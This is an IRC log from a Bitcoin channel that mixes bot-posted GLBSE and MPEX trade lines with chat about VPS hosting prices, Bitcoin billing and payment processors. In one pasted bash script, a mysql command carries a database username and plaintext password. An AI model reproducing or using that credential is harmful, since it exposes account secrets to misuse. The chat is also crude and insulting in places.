[ASICMINER] 86 @ 0.104 = 8.944 BTC [+] Sep 09 20:46:33 [GLBSE] [FDBF] 4 @ 0.15 = 0.6 BTC [+] Sep 09 20:47:20 [GLBSE] [YABMC] 1 @ 0.115 BTC [+] Sep 09 20:47:28 [GLBSE] [OBSI.HRPT] 180 @ 0.1 = 18 BTC [-] Sep 09 20:48:13 [GLBSE] [ASICMINER] 14 @ 0.104 = 1.456 BTC [+] Sep 09 20:48:14 [GLBSE] [ASICMINER] 100 @ 0.105 = 10.5 BTC [+] Sep 09 20:48:15 [GLBSE] [ASICMINER] 100 @ 0.106 = 10.6 BTC [+] Sep 09 20:48:16 [GLBSE] [ASICMINER] 100 @ 0.107 = 10.7 BTC [+] Sep 09 20:56:50 [GLBSE] [ASICMINER] 1 @ 0.107 BTC [+] Sep 09 21:02:16 [GLBSE] [FUTUREFUND] 12 @ 0.000123 = 0.0015 BTC [+] Sep 09 21:03:12 [GLBSE] [FUTUREFUND] 2 @ 0.000123 = 0.0002 BTC [+] Sep 09 21:07:14 Diablo-D3: that's not too bad Sep 09 21:07:24 mind you it also comes with IPMI, etc Sep 09 21:07:28 lots of hosts dont do that Sep 09 21:07:33 the main caveat tho Sep 09 21:07:39 enzu's internal network is only 100mbit Sep 09 21:07:49 i remember transferring VM data was like pulling teeth with a spoon Sep 09 21:08:35 rg: btw, they just raised their prices Sep 09 21:08:44 so you'd be paying what I would be now Sep 09 21:09:01 yeah... sure Sep 09 21:09:18 when is 'just' Sep 09 21:09:24 cause i 'just' got a new box Sep 09 21:09:25 at those prices Sep 09 21:09:34 bdwarr6 says otherwise Sep 09 21:09:45 duh Sep 09 21:09:53 'no customer 1 never got that price' Sep 09 21:09:57 'but you did, so you should pay it' Sep 09 21:10:03 it reminds me of that scene Sep 09 21:10:05 in the wdding singer Sep 09 21:10:09 never seen it Sep 09 21:10:10 and you would go and run to them about prices Sep 09 21:10:12 like a little bitch Sep 09 21:10:21 'wahhh im gonna taddle cause someone else got ab etter price' Sep 09 21:10:22 wahhhh Sep 09 21:10:24 im a little girl Sep 09 21:10:26 rg: no, I was going to try to press him for better prices and pocket it Sep 09 21:10:34 thats.. what i just said Sep 09 21:11:01 no it isnt Sep 09 21:11:10 you took what i said Sep 09 21:11:13 and tried to use it agains them Sep 09 21:11:13 I went IM THE BAUS, you went MY LITTLE PONY, MY LITTLE PONY Sep 09 21:11:16 that's taddling Sep 09 21:11:22 and also why i dont like discussing money Sep 09 21:11:25 cause if you knew what i really paid Sep 09 21:11:28 you'd cry like a little bitch Sep 09 21:11:36 'but i also do things for them Sep 09 21:11:40 and that's the reason why Sep 09 21:11:47 rg: btw, know of anyone reselling absolute shit vpses but cheap? Sep 09 21:11:53 yeah Sep 09 21:11:54 i do Sep 09 21:11:59 check out serverdeals.org Sep 09 21:12:04 they have a reseller program Sep 09 21:12:05 and everything Sep 09 21:12:14 if you sell a decent amount Sep 09 21:12:17 you will get a bunch of discounts Sep 09 21:12:21 but theyre OpenVZ only Sep 09 21:12:27 i contemplated doing it cause our chi node is filled Sep 09 21:12:37 pretty much Sep 09 21:12:47 usagi: erm, you do realize we both work with the same companies, right? Sep 09 21:12:58 Diablo-D3: also serverdeals has nice support Sep 09 21:13:01 theres one dude who does all my stuff Sep 09 21:13:02 named Charlse Sep 09 21:13:04 Charles Sep 09 21:13:05 hes the man Sep 09 21:13:07 usagi: I've known nenolod for about 9000 years, nenolod now works for the company Im doing business with Sep 09 21:13:15 if its 3am or 5pm Sep 09 21:13:17 charles always anwers Sep 09 21:13:28 usagi: diablo-d3 decided to open a company Sep 09 21:13:30 in the same DC as bitvps Sep 09 21:13:46 obviously a direct attack on me Sep 09 21:13:49 and my company Sep 09 21:13:53 but hes going to fail anyway so im not worried Sep 09 21:13:53 yes, its a direct attack on bitvps Sep 09 21:14:01 its so direct that rg is just going to get dedis from me Sep 09 21:14:01 [GLBSE] [YABMC] 3 @ 0.115 = 0.345 BTC [+] Sep 09 21:14:10 Diablo-D3: i actually wa gonna do that Sep 09 21:14:13 but i get better pricing Sep 09 21:14:15 but it also might be worht it Sep 09 21:14:17 if you do support Sep 09 21:14:24 rg: we could split support Sep 09 21:14:25 cause i have my hands full wit bitvps spport Sep 09 21:14:33 most of its easy shit Sep 09 21:14:37 but still shit that needs completing none the less Sep 09 21:14:45 rg: btw, you take shit in btc right? how did you setup billing? Sep 09 21:14:55 Diablo-D3: all our prices are decided in USD Sep 09 21:15:01 and every 5 minutes it pulls the 24hr avg from mtgox Sep 09 21:15:06 and readjusts the price/invoics Sep 09 21:15:07 based on that Sep 09 21:15:20 we tried to do a completely BTC business Sep 09 21:15:22 prices in btc, no usd Sep 09 21:15:25 but that lasted about a month Sep 09 21:15:32 a month and $600 later Sep 09 21:15:33 hehe Sep 09 21:15:42 what are you using for the invoicing? Sep 09 21:16:34 [MPEX] [S.MPOE] 8300 @ 0.00039654 = 3.2913 BTC [+] Sep 09 21:16:35 [MPEX] [S.MPOE] 10004 @ 0.00039472 = 3.9488 BTC [-] Sep 09 21:16:36 [MPEX] [S.MPOE] 5596 @ 0.00039466 = 2.2085 BTC [-] Sep 09 21:17:14 rg: because Im wondering if bitinstant can actually do the job for the payment gateway and then glue a standard enterprise invoicing kit on top Sep 09 21:22:32 bitinstant? Sep 09 21:22:35 why not umm Sep 09 21:22:39 the other guys Sep 09 21:22:40 uhh Sep 09 21:22:45 bit-pay Sep 09 21:22:54 [14:16] It looks like a PERL script. Sep 09 21:22:55 lol Sep 09 21:22:57 its bash script Sep 09 21:22:57 :) Sep 09 21:23:16 if you throw enough awk and sed in.. whats the difference? Sep 09 21:23:40 rg: bitinstant has that walmart shit going on Sep 09 21:23:46 [GLBSE] [BFLS] 1 @ 0.9 BTC [-] Sep 09 21:23:55 #!/bin/bash Sep 09 21:23:55 # if the files exist, get rid of them, they're stale Sep 09 21:23:55 if test -f /tmp/price;then Sep 09 21:23:55 rm -rf /tmp/price Sep 09 21:23:55 fi Sep 09 21:23:58 if test -f /tmp/updates.sql;then Sep 09 21:24:00 rm -rf /tmp/updates.sql Sep 09 21:24:02 fi Sep 09 21:24:12 # run the script to update all the prices Sep 09 21:24:12 /usr/bin/conv Sep 09 21:24:32 rg: I can go to 7-11, cvs, or walmart Sep 09 21:24:36 and deposit money with bitinstant Sep 09 21:24:40 # commit those changes to the backend Sep 09 21:24:40 mysql -u readonly_whm -pmcGURKin whm < /tmp/updates.sq Sep 09 21:24:55 THEN AGAIN Sep 09 21:24:57 way to paste a password rg Sep 09 21:25:03 rg: HAH Sep 09 21:25:06 good going dude Sep 09 21:25:13 im kidding Sep 09 21:25:13 anyhow, THEN AGAIN Sep 09 21:25:26 bitpay has whmcs intergration Sep 09 21:25:36 well Sep 09 21:25:38 if you're going to use whmcs Sep 09 21:25:40 you dontn eed bitpay at all Sep 09 21:25:51 dont want to run a local bitcoind Sep 09 21:26:08 i suggest using kreals service Sep 09 21:26:14 he has whmcs plugins too Sep 09 21:26:24 and if something goes wrong you can complain @ him on irc Sep 09 21:26:49 he has a service? Sep 09 21:26:59 yeha Sep 09 21:27:02 he runs walletbit Sep 09 21:27:11 and they've moved into payment processing Sep 09 21:27:20 ive used it, its pretty good Sep 09 21:27:22 and kreal is smart Sep 09 21:27:29 in spite of being from denmark Sep 09 21:27:34 nothing stops me from adding all three Sep 09 21:27:51 lol i guess Sep 09 21:28:04 id stay away from WHMCS Sep 09 21:28:05 if possible Sep 09 21:28:10 it took a LONG time to get it working the way we have it Sep 09 21:28:17 MUCH trial and *error* Sep 09 21:29:02 rg: well Sep 09 21:29:04 what else is there? Sep 09 21:29:35 [GLBSE] [NASTY] 2 @ 0.5999 = 1.1998 BTC [-] Sep 09 21:30:26 make your own Sep 09 21:30:29 meh Sep 09 21:32:20 what's his face Sep 09 21:32:20 I guess I could Sep 09 21:32:22 but what a pita Sep 09 21:32:25 netxshare wrote a whole ordering system in PHP Sep 09 21:32:30 it only took him a day Sep 09 21:32:45 yuck php Sep 09 21:34:28 [GLBSE] [OBSI.HRPT] 1 @ 0.1 BTC [-] Sep 09 21:36:13 well Sep 09 21:36:21 i suggest PHP cause if you use PHP your job is already half done Sep 09 21:36:47 [GLBSE] [NYAN.C] 8 @ 0.501001 = 4.008 BTC [-] Sep 09 21:36:52 dude, I have been using perl for like a decade Sep 09 21:37:04 ok Sep 09 21:37:04 with cpan, my job has probably already done 5 times Sep 09 21:37:07 use perl Sep 09 21:37:09 im just saying Sep 09 21:37:12 jsonrpc.php already exists Sep 09 21:37:14 and works perfectly Sep 09 21:37:26 [GLBSE] [NYAN.B] 4 @ 0.99 = 3.96 BTC [-] Sep 09 21:38:10 [GLBSE] [ASICMINER] 3 @ 0.108 = 0.324 BTC [+] Sep 09 21:41:04 [GLBSE] [ASICMINER] 40 @ 0.0999 = 3.996 BTC [-] Sep 09 21:47:49 [GLBSE] [PUREMINING] 1 @ 0.09577 BTC [+] Sep 09 21:56:56 so Sep 09 21:57:03 i guess i can put an IPO up on gbse Sep 09 21:57:08 about my pot grownig operatin Sep 09 21:57:11 operation* Sep 09 21:59:01 [GLBSE] [OBSI.HRPT] 240 @ 0.1 = 24 BTC [-] Sep 09 22:01:30 lol Sep 09 22:05:53 sure thing rg Sep 09 22:05:59 i'll buy shares Sep 09 22:06:08 rg do you register domains as well Sep 09 22:09:43 [GLBSE] [GSDPT] 15 @ 0.003395 = 0.0509 BTC [-] Sep 09 22:10:07 rg: so which of us can do cheaper vps? Sep 09 22:10:16 [GLBSE] [FPGAMINING] 1 @ 0.7995 BTC [+] Sep 09 22:10:18 [GLBSE] [FPGAMINING] 4 @ 0.79978998 = 3.1992 BTC [+] Sep 09 22:10:22 probably you Sep 09 22:11:03 [GLBSE] [NYAN.B] 6 @ 0.99 = 5.94 BTC [-] Sep 09 22:11:43 rg: how much money do you personally make off of this? Sep 09 22:14:25 usagi: you just made little to no sense. Sep 09 22:15:00 usagi: that has nothing to do with an invoicing and billing frontend though Sep 09 22:15:33 bwhahaha Sep 09 22:15:34 oh man Sep 09 22:15:39 you fail at economics Sep 09 22:15:59 usagi: do you realize why amazon is basically the king of expensive overpriced webs hit? Sep 09 22:16:21 *web shit Sep 09 22:16:24 amazon is just a name Sep 09 22:16:26 that's why people use it Sep 09 22:16:29 usagi: nope. Sep 09 22:16:38 amazon's cloud services are a recent thing Sep 09 22:16:44 they're not the first nor the first major one Sep 09 22:16:56 erm Sep 09 22:16:58 ec2 isnt *that* new Sep 09 22:17:03 rg: in amazon history it is Sep 09 22:17:07 amazons like a decade old now Sep 09 22:17:21 Amazon announced a limited public beta of EC2 on August 25, 2006 Sep 09 22:17:52 yes, and I was personally doing fault tolerant parallel multi-site storage in the late 90s. Sep 09 22:18:15 rg: amazon was founded in 1994 Sep 09 22:18:28 so? Sep 09 22:18:30 jesus, they're 18 years old now Sep 09 22:18:36 thats insane Sep 09 22:18:36 that doesnt change ec2's start date Sep 09 22:18:45 no, but im saying, they're not an early player Sep 09 22:19:02 and then you have to question if ec2 itself counts as a cloud service Sep 09 22:19:08 since its just hands free vps allocation Sep 09 22:20:13 but thats not what Im talking about anyways, so lets rewind here Sep 09 22:20:33 amazon is fucking popular, even though their shit is the most expensive of any major offering, because Sep 09 22:20:37 they make it look good. Sep 09 22:20:44 goddamnit usagi Sep 09 22:21:19 [03:20:28] amazon is fucking popular, even though their shit is the most expensive of any major offering, because Sep 09 22:21:19 [03:20:33] they make it look good. Sep 09 22:21:28 the experience is smooth and flawless. Sep 09 22:21:35 they polished the shit out of it Sep 09 22:22:01 they appled it, they ciscoed it, they sunned it. Sep 09 22:22:07 whatever you want to call it Sep 09 22:22:57 sounds like linux Sep 09 22:23:33 jcpham: yes, amazon uses linux everywhere Sep 09 22:23:40 but thats neither here nor there Sep 09 22:23:47 linux happened Sep 09 22:23:51 automation happened Sep 09 22:23:56 \blah blah soapbox Sep 09 22:23:56 usagi: everything, even down to their fucking billing system, its perfect Sep 09 22:24:08 jcpham: Ive been using linux as my primary desktop os for almost 15 years Sep 09 22:24:15 \blah blah soapbox Sep 09 22:24:17 so, yes, it happened. awhile back. Sep 09 22:24:48 [GLBSE] [BDK.BND] 60 @ 0.1009 = 6.054 BTC [+] Sep 09 22:25:26 [MPEX] [S.MPOE] 200 @ 0.00039553 = 0.0791 BTC [+] Sep 09 22:25:28 [MPEX] [S.MPOE] 9816 @ 0.00039466 = 3.874 BTC [-] Sep 09 22:25:34 usagi: so dont tell me that i can just scrap together a shitty billing system and be happy with it Sep 09 22:25:41 [GLBSE] [NYAN.C] 9 @ 0.501 = 4.509 BTC [-] Sep 09 22:25:41 [GLBSE] [NYAN.C] 9 @ 0.461 = 4.149 BTC [-] Sep 09 22:25:43 [GLBSE] [NYAN.C] 9 @ 0.401 = 3.609 BTC [-] Sep 09 22:25:44 [GLBSE] [NYAN.C] 10 @ 0.4 = 4 BTC [-] Sep 09 22:25:45 [GLBSE] [NYAN.C] 9 @ 0.331 = 2.979 BTC [-] Sep 09 22:25:46 [GLBSE] [NYAN.C] 4 @ 0.3011 = 1.2044 BTC [-] Sep 09 22:25:48 [GLBSE] [BDK.BND] 2 @ 0.1009 = 0.2018 BTC [+] Sep 09 22:28:50 [MPEX] [S.MPOE] 43022 @ 0.00039466 = 16.9791 BTC [-] Sep 09 22:28:51 [MPEX] [S.MPOE] 11078 @ 0.00039459 = 4.3713 BTC [-] Sep 09 22:30:57 [GLBSE] [ASICMINER] 1 @ 0.103 BTC [+] Sep 09 22:31:33 [GLBSE] [ASICMINER] 42 @ 0.103 = 4.326 BTC [+] Sep 09 22:33:16 [GLBSE] [ASICMINER] 31 @ 0.1 = 3.1 BTC [-] Sep 09 22:33:24 [GLBSE] [BDT] 8 @ 1.049 = 8.392 BTC [-] Sep 09 22:34:23 [GLBSE] [FDBF] 1 @ 0.15 BTC [+] Sep 09 22:37:22 [GLBSE] [GSDPT] 7 @ 0.003395 = 0.0238 BTC [-] Sep 09 22:39:13 [GLBSE] [FPGAMINING] 1 @ 0.7505 BTC [-] Sep 09 22:39:15 [GLBSE] [FPGAMINING] 1 @ 0.7501 BTC [-] Sep 09 22:39:16 [GLBSE] [FPGAMINING] 10 @ 0.7501 = 7.501 BTC [-] Sep 09 22:39:17 [GLBSE] [FPGAMINING] 10 @ 0.75 = 7.5 BTC [-] Sep 09 22:42:30 [GLBSE] [ASICMINER] 100 @ 0.101 = 10.1 BTC [+] Sep 09 22:43:46 [MPEX] [F.GIGA.ETF] 11149 @ 0.00066573 = 7.4222 BTC [-] Sep 09 22:43:47 [MPEX] [F.GIGA.ETF] 11520 @ 0.00066505 = 7.6614 BTC [-] Sep 09 22:45:33 anyhow, Im going to bed Sep 09 22:45:34 night all Sep 09 22:52:53 [GLBSE] [FPGAMINING] 1 @ 0.79978998 BTC [+] Sep 09 22:57:51 ;;tslb Sep 09 22:57:54 Time since last block: 4 minutes and 49 seconds Sep 09 22:57:57 hm Sep 09 22:58:04 aha Sep 09 23:04:20 [GLBSE] [THUNDERCM.MIF.SHARES] 2 @ 0.3971 = 0.7942 BTC [-] Sep 09 23:14:55 [MPEX] [F.GIGA.ETF] 5600 @ 0.00064896 = 3.6342 BTC [-] Sep 09 23:19:55 lol Sep 09 23:20:00 its so funny to see what people run on their VPS Sep 09 23:20:05 such random shit Sep 09 23:20:24 [MPEX] [S.MPOE] 6656 @ 0.00039459 = 2.6264 BTC [-] Sep 09 23:21:08 Matthew and Pirateat40 are finally marked as SCAMMER this means Matthew N Wright is no longer mod/staff member on the forum :D Sep 09 23:21:25 why is matthew a scammer? Sep 09 23:21:30 i thought he was legit Sep 09 23:21:32 he was for a while Sep 09 23:21:33 did not pay his bet Sep 09 23:21:54 dont make jokes about 80k btc Sep 09 23:23:16 now the question is will anybody recieve the next issue of bitcoin magazin? Sep 09 23:23:36 as he did not pay his writers Sep 09 23:24:28 www.firenzee.com/howthemightyhavefallen.jpg Sep 09 23:24:31 for your viewing pleasure Sep 09 23:29:06 [GLBSE] [GSDPT] 8 @ 0.003395 = 0.0272 BTC [-] Sep 09 23:30:21 ;;lastseen nefario Sep 09 23:30:22 Error: "lastseen" is not a valid command. Sep 09 23:30:32 ;;seen nefario Sep 09 23:30:32 nefario was last seen in #bitcoin-assets 1 day, 20 hours, 51 minutes, and 24 seconds ago: it's too much of a conflict of interest Sep 09 23:33:08 [GLBSE] [MU] 1 @ 0.2698 BTC [-] Sep 09 23:37:39 yep hes on the list as #1 Sep 09 23:40:11 [GLBSE] [OBSI.HRPT] 1 @ 0.1011 BTC [+] Sep 09 23:52:52 [GLBSE] [OBSI.HRPT] 5 @ 0.1011 = 0.5055 BTC [+] Sep 09 23:56:14 [GLBSE] [MU] 1 @ 0.2699 BTC [+] Sep 09 23:56:28 [GLBSE] [MU] 1 @ 0.2699 BTC [+] Sep 09 23:57:03 [GLBSE] [ASICMINER] 1 @ 0.102 BTC [+] Sep 09 23:57:34 [GLBSE] [DMC] 1 @ 0.0649999 BTC [+] Sep 09 23:59:34 [GLBSE] [OBSI.HRPT] 1 @ 0.1011 BTC [+] Sep 10 00:07:41 [GLBSE] [OBSI.HRPT] 5 @ 0.1011 = 0.5055 BTC [+] Sep 10 00:11:25 [GLBSE] [OBSI.HRPT] 3 @ 0.1011 = 0.3033 BTC [+] Sep 10 00:13:47 [MPEX] [S.MPOE] 21466 @ 0.00039459 = 8.4703 BTC [-] Sep 10 00:13:48 [MPEX] [S.MPOE] 31534 @ 0.00039458 = 12.4427 BTC [-] Sep 10 00:16:08 [GLBSE] [KRAKEN] 10 @ 0.00999999 = 0.1 BTC [-] Sep 10 00:17:32 [GLBSE] [TEEK.B] 5 @ 0.7301 = 3.6505 BTC [-] Sep 10 00:19:59 [GLBSE] [PUREMINING] 30 @ 0.09577 = 2.8731 BTC [+] Sep 10 00:25:10 [GLBSE] [OBSI.HRPT] 8 @ 0.1011 = 0.8088 BTC [+] Sep 10 00:28:26 usagi what is blackbox Sep 10 00:30:38 https://bitcointalk.org/index.php?topic=81993.0 Sep 10 00:32:51 [GLBSE] [FDBF] 100 @ 0.15 = 15 BTC [+] Sep 10 00:32:53 [GLBSE] [GIGAMINING] 2 @ 0.7199 = 1.4398 BTC [+] Sep 10 00:32:55 :D Sep 10 00:36:12 [GLBSE] [UDN] 6 @ 0.045 = 0.27 BTC [-] Sep 10 00:39:13 [MPEX] [F.GIGA.ETF] 3900 @ 0.00063655 = 2.4825 BTC [-] Sep 10 00:39:34 [MPEX] [S.MPOE] 13266 @ 0.00039458 = 5.2345 BTC [-] Sep 10 00:39:36 [MPEX] [S.MPOE] 8885 @ 0.00039458 = 3.5058 BTC [-] Sep 10 00:40:19 [MPEX] [S.MPOE] 4059 @ 0.00039458 = 1.6016 BTC [-] Sep 10 00:40:21 [MPEX] [S.MPOE] 23792 @ 0.00039453 = 9.3867 BTC [-] Sep 10 00:48:14 [GLBSE] [GSDPT] 7 @ 0.003395 = 0.0238 BTC [-] Sep 10 00:48:40 [GLBSE] [DI.BFLSC.FAIL] 64 @ 0.001 = 0.064 BTC [+] Sep 10 00:49:04 [GLBSE] [ASICMINER] 4 @ 0.1001 = 0.4004 BTC [-] Sep 10 00:49:05 [GLBSE] [ASICMINER] 69 @ 0.1 = 6.9 BTC [-] Sep 10 00:51:44 [GLBSE] [TEEK.A] 28 @ 0.87499 = 24.4997 BTC [-] Sep 10 00:55:06 [GLBSE] [COGNITIVE] 17 @ 0.62 = 10.54 BTC [+] Sep 10 00:55:07 [GLBSE] [COGNITIVE] 5 @ 0.6 = 3 BTC [-] Sep 10 00:55:09 [GLBSE] [COGNITIVE] 3 @ 0.6 = 1.8 BTC [-] Sep 10 00:56:18 [GLBSE] [TEEK.USD] 37 @ 0.0899 = 3.3263 BTC [+] Sep 10 00:57:37 [GLBSE] [RSM] 11 @ 0.3 = 3.3 BTC [+] Sep 10 00:57:38 [GLBSE] [RSM] 60 @ 0.3 = 18 BTC [+] Sep 10 00:58:49 [GLBSE] [COGNITIVE] 15 @ 0.56 = 8.4 BTC [-] Sep 10 00:58:50 [GLBSE] [COGNITIVE] 35 @ 0.555 = 19.425 BTC [-] Sep 10 00:58:51 [GLBSE] [COGNITIVE] 2 @ 0.5501 = 1.1002 BTC [-] Sep 10 00:58:52 [GLBSE] [COGNITIVE] 6 @ 0.55 = 3.3 BTC [-] Sep 10 00:58:53 [GLBSE] [COGNITIVE] 1 @ 0.5001 BTC [-] Sep 10 01:01:10 [GLBSE] [COGNITIVE] 1 @ 0.5 BTC [-] Sep 10 01:01:35 [GLBSE] [KRAKEN] 30 @ 0.00999999 = 0.3 BTC [-] Sep 10 01:02:47 [GLBSE] [OBSI.HRPT] 10 @ 0.1011 = 1.011 BTC [+] Sep 10 01:06:43 [GLBSE] [OBSI.HRPT] 1 @ 0.1011 BTC [+] Sep 10 01:08:02 [GLBSE] [NASTY] 1 @ 0.55000001 BTC [-] Sep 10 01:08:04 [GLBSE] [NASTY] 1 @ 0.55 BTC [-] Sep 10 01:08:05 [GLBSE] [NASTY] 4 @ 0.523 = 2.092 BTC [-] Sep 10 01:08:06 [GLBSE] [NASTY] 5 @ 0.52 = 2.6 BTC [-] Sep 10 01:08:08 [GLBSE] [NASTY] 2 @ 0.51 = 1.02 BTC [-] Sep 10 01:08:09 [GLBSE] [NASTY] 10 @ 0.491 = 4.91 BTC [-] Sep 10 01:08:47 [MPEX] [S.MPOE] 200 @ 0.00039617 = 0.0792 BTC [+] Sep 10 01:08:47 [MPEX] [S.MPOE] 55300 @ 0.00039663 = 21.9336 BTC [+] Sep 10 01:10:23 [GLBSE] [PUREMINING] 5 @ 0.09260001 = 0.463 BTC [-] Sep 10 01:10:25 [GLBSE] [PUREMINING] 1 @ 0.0926 BTC [-] Sep 10 01:10:26 [GLBSE] [PUREMINING] 1 @ 0.092501 BTC [-] Sep 10 01:10:27 [GLBSE] [PUREMINING] 3 @ 0.0924 = 0.2772 BTC [-] Sep 10 01:10:29 [GLBSE] [PUREMINING] 43 @ 0.0923 = 3.9689 BTC [-] Sep 10 01:10:30 [GLBSE] [PUREMINING] 52 @ 0.0922 = 4.7944 BTC [-] Sep 10 01:11:52 [GLBSE] [YARR] 8 @ 1 = 8 BTC [-] Sep 10 01:14:55 [GLBSE] [MOVETO.FUND] 4 @ 0.9001 = 3.6004 BTC [-] Sep 10 01:14:57 [GLBSE] [MOVETO.FUND] 28 @ 0.9 = 25.2 BTC [-] Sep 10 01:20:36 [GLBSE] [JLP-BMD] 3 @ 0.0555 = 0.1665 BTC [-] Sep 10 01:20:37 [GLBSE] [JLP-BMD] 72 @ 0.0551 = 3.9672 BTC [-] Sep 10 01:20:38 [GLBSE] [JLP-BMD] 50 @ 0.055 = 2.75 BTC [-] Sep 10 01:20:39 [GLBSE] [JLP-BMD] 29 @ 0.05 = 1.45 BTC [-] Sep 10 01:21:13 [GLBSE] [GIGAMINING] 27 @ 0.72 = 19.44 BTC [+] Sep 10 01:23:21 [GLBSE] [TEEK.B] 2 @ 0.5 = 1 BTC [-] Sep 10 01:24:02 [GLBSE] [MU] 5 @ 0.25 = 1.25 BTC [-] Sep 10 01:24:12 [GLBSE] [OBSI.HRPT] 16 @ 0.1011 = 1.6176 BTC [+] Sep 10 01:24:14 [GLBSE] [OBSI.HRPT] 44 @ 0.1015 = 4.466 BTC [+] Sep 10 01:25:16 [GLBSE] [MERGEDMINING] 50 @ 0.0601 = 3.005 BTC [-] Sep 10 01:25:18 [GLBSE] [MERGEDMINING] 1 @ 0.06005 BTC [-] Sep 10 01:25:18 [GLBSE] [MERGEDMINING] 19 @ 0.06 = 1.14 BTC [-] Sep 10 01:28:54 [GLBSE] [OBSI.HRPT] 55 @ 0.1015 = 5.5825 BTC [+] Sep 10 01:28:55 [GLBSE] [OBSI.HRPT] 445 @ 0.10158 = 45.2031 BTC [+] Sep 10 01:30:15 [GLBSE] [OBSI.HRPT] 1 @ 0.10158 BTC [+] Sep 10 01:34:28 [GLBSE] [PUREMINING] 5 @ 0.09577 = 0.4789 BTC [+] Sep 10 01:41:21 [GLBSE] [BITBOND] 5 @ 0.4006 = 2.003 BTC [-] Sep 10 01:41:23 [GLBSE] [BITBOND] 2 @ 0.4005 = 0.801 BTC [-] Sep 10 01:41:24 [GLBSE] [BITBOND] 4 @ 0.4 = 1.6 BTC [-] Sep 10 01:41:25 [GLBSE] [BITBOND] 2 @ 0.4 = 0.8 BTC [-] Sep 10 01:41:54 [GLBSE] [ASICMINER] 1 @ 0.1 BTC [-] Sep 10 01:47:23 [MPEX] [S.MPOE] 200 @ 0.00039499 = 0.079 BTC [-] Sep 10 01:47:24 [MPEX] [S.MPOE] 10508 @ 0.00039453 = 4.1457 BTC [-] Sep 10 01:47:26 [MPEX] [S.MPOE] 13192 @ 0.00039453 = 5.2046 BTC [-] Sep 10 01:52:47 [MPEX] [S.MPOE] 200 @ 0.00039626 = 0.0793 BTC [+] Sep 10 01:52:49 [MPEX] [S.MPOE] 7195 @ 0.00039663 = 2.8538 BTC [+] Sep 10 01:52:50 [MPEX] [S.MPOE] 20400 @ 0.00039923 = 8.1443 BTC [+] Sep 10 01:52:51 [MPEX] [S.MPOE] 30905 @ 0.00040026 = 12.37 BTC [+] Sep 10 02:11:29 [GLBSE] [OBSI.HRPT] 2 @ 0.10158 = 0.2032 BTC [+] Sep 10 02:12:27 [GLBSE] [OBSI.HRPT] 20 @ 0.10158 = 2.0316 BTC [+] Sep 10 02:14:53 [GLBSE] [OBSI.HRPT] 5 @ 0.10158 = 0.5079 BTC [+] Sep 10 02:15:16 [GLBSE] [CPA] 20 @ 0.031 = 0.62 BTC [+] Sep 10 02:15:18 [GLBSE] [SILVER] 1 @ 0.01 BTC [+] Sep 10 02:15:27 [GLBSE] [FUTUREFUND] 4 @ 0.000123 = 0.0005 BTC [+] Sep 10 02:16:27 [GLBSE] [FUTUREFUND] 24 @ 0.000123 = 0.003 BTC [+] Sep 10 02:20:34 [GLBSE] [OBSI.1MHS] 1 @ 0.1 BTC [-] Sep 10 02:23:42 [GLBSE] [PUREMINING] 1 @ 0.09576999 BTC [-] Sep 10 02:23:52 [GLBSE] [CPA] 40 @ 0.03 = 1.2 BTC [-] Sep 10 02:28:21 [GLBSE] [UDN] 33 @ 0.0715 = 2.3595 BTC [+] Sep 10 02:32:09 [GLBSE] [THUNDERCM.MIF.SHARES] 10 @ 0.3974 = 3.974 BTC [+] Sep 10 02:59:36 [GLBSE] [OBSI.HRPT] 4 @ 0.10158 = 0.4063 BTC [+] Sep 10 03:09:17 [GLBSE] [BITNODES] 1 @ 0.24 BTC [-] Sep 10 03:31:31 [MPEX] [F.GIGA.ETF] 5100 @ 0.00063655 = 3.2464 BTC [-] Sep 10 03:34:17 [GLBSE] [OBSI.HRPT] 3 @ 0.1016 = 0.3048 BTC [+] Sep 10 03:35:32 [GLBSE] [GIGAMINING] 3 @ 0.72 = 2.16 BTC [+] Sep 10 03:37:19 [GLBSE] [ASICMINER] 1 @ 0.1019 BTC [+] Sep 10 03:40:03 <@assbot> [MPEX] [S.MPOE] 30905 @ 0.00040026 = 12.37 BTC [+], seems you just cant keep it under .0004 Sep 10 03:48:19 [GLBSE] [JLP-BMD] 6 @ 0.0499 = 0.2994 BTC [-] Sep 10 03:48:59 smickles shit floats :D Sep 10 03:56:18 [GLBSE] [FPGAMINING] 10 @ 0.76 = 7.6 BTC [-] Sep 10 03:58:28 http://raidcoin.com/ this is pretty rad. Sep 10 04:02:47 pdf nothx Sep 10 04:04:06 [GLBSE] [PUREMINING] 3 @ 0.09576999 = 0.2873 BTC [-] Sep 10 04:05:01 [MPEX] [S.MPOE] 46000 @ 0.0003989 = 18.3494 BTC [-] Sep 10 04:05:02 [MPEX] [S.MPOE] 5500 @ 0.00039911 = 2.1951 BTC [+] Sep 10 04:07:02 its for printing pages Sep 10 04:07:06 paper wallet. Sep 10 04:08:10 printing.. paper.. I only vaguely remember these relics Sep 10 04:10:48 well its supposedly much safer for wallets. Sep 10 04:13:18 [MPEX] [S.MPOE] 39700 @ 0.00039911 = 15.8447 BTC [+] Sep 10 04:18:47 [GLBSE] [BDK.BND] 100 @ 0.1 = 10 BTC [-] Sep 10 04:20:11 [GLBSE] [RAREEARTH] 5 @ 0.00955 = 0.0478 BTC [+] Sep 10 04:26:03 [GLBSE] [CPA] 4 @ 0.0236 = 0.0944 BTC [-] Sep 10 04:33:53 [GLBSE] [OBSI.HRPT] 3 @ 0.10159998 = 0.3048 BTC [-] Sep 10 04:34:58 [GLBSE] [GIGAMINING] 5 @ 0.7151 = 3.5755 BTC [-] Sep 10 04:34:59 [GLBSE] [GIGAMINING] 134 @ 0.715 = 95.81 BTC [-] Sep 10 04:40:49 https://bitcointalk.org/index.php?topic=104707.0 this is a sad read. Sep 10 04:43:25 [GLBSE] [BIB.BVPS] 2500 @ 0.00445 = 11.125 BTC [-] Sep 10 04:44:18 [GLBSE] [BIB.BVPS] 13 @ 0.00445 = 0.0579 BTC [-] Sep 10 04:44:20 [GLBSE] [OBSI.HRPT] 2 @ 0.10159998 = 0.2032 BTC [-] Sep 10 04:58:15 [GLBSE] [GIGAMINING] 5 @ 0.7101 = 3.5505 BTC [-] Sep 10 04:58:40 [MPEX] [S.MPOE] 200 @ 0.00039692 = 0.0794 BTC [-] Sep 10 04:58:41 [MPEX] [S.MPOE] 38053 @ 0.00039599 = 15.0686 BTC [-] Sep 10 04:58:43 [MPEX] [S.MPOE] 11147 @ 0.00039487 = 4.4016 BTC [-] Sep 10 04:58:50 [GLBSE] [GIGAMINING] 3 @ 0.71 = 2.13 BTC [-] Sep 10 05:05:03 [GLBSE] [GIGAMINING] 50 @ 0.70011 = 35.0055 BTC [-] Sep 10 05:11:50 [GLBSE] 